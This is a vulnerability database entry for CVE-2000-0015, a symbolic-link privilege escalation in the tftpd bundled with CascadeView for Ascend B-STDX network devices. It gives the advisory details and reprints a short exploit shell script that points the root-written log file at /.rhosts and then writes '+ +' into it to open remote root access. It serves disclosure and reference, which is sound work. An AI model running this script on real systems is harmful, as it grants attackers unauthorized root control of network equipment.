CascadeView tftpd Privilege Escalation Vulnerability


Vulnerability ID: 1105668
Vulnerability type: Boundary condition error
Published: 1999-12-31
Updated: 2005-05-02
CVE ID: CVE-2000-0015
CNNVD-ID: CNNVD-199912-151
Platform: Unix
CVSS score: 4.6
|Vulnerability source
https://www.exploit-db.com/exploits/19707
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-151
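|Vulnerability details
The CascadeView TFTP server contains a vulnerability. A local user can escalate privileges through a symbolic link attack.
|Exploit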
source: http://www.securityfocus.com/bid/910/info

The tftpd bundled with CascadeView for Ascend's B-STDX 8000/9000 network devices creates a log in /tmp called tftpd_xfer_status.log. If /tmp/tftpd_xfer_status.log already exists as a symbolic link, tftpd will follow it and overwrite any data it points to (it runs as root). An attacker can link the log file to a file such as /.rhosts to gain elevated privileges on the device. Because this is a network device vulnerability, the consequences of a compromise could be much greater for the network the device is on than if it were a single regular host.

#!/bin/sh
#
# tftpserv.sh - Loneguard 07/03/99
#
# Buggy tftp server shipped with CascadeView B-STDX 8000/9000
#
rm /tmp/tftpd_xfer_status.log
ln -s /.rhosts /tmp/tftpd_xfer_status.log
echo KungFu > crazymonkey
( sleep 1 ; echo put crazymonkey ; sleep 1 ; echo quit ) | tftp 127.1
echo "+ +" > /.rhosts
|References

Source: BID
Name: 910
Link: http://www.securityfocus.com/bid/910
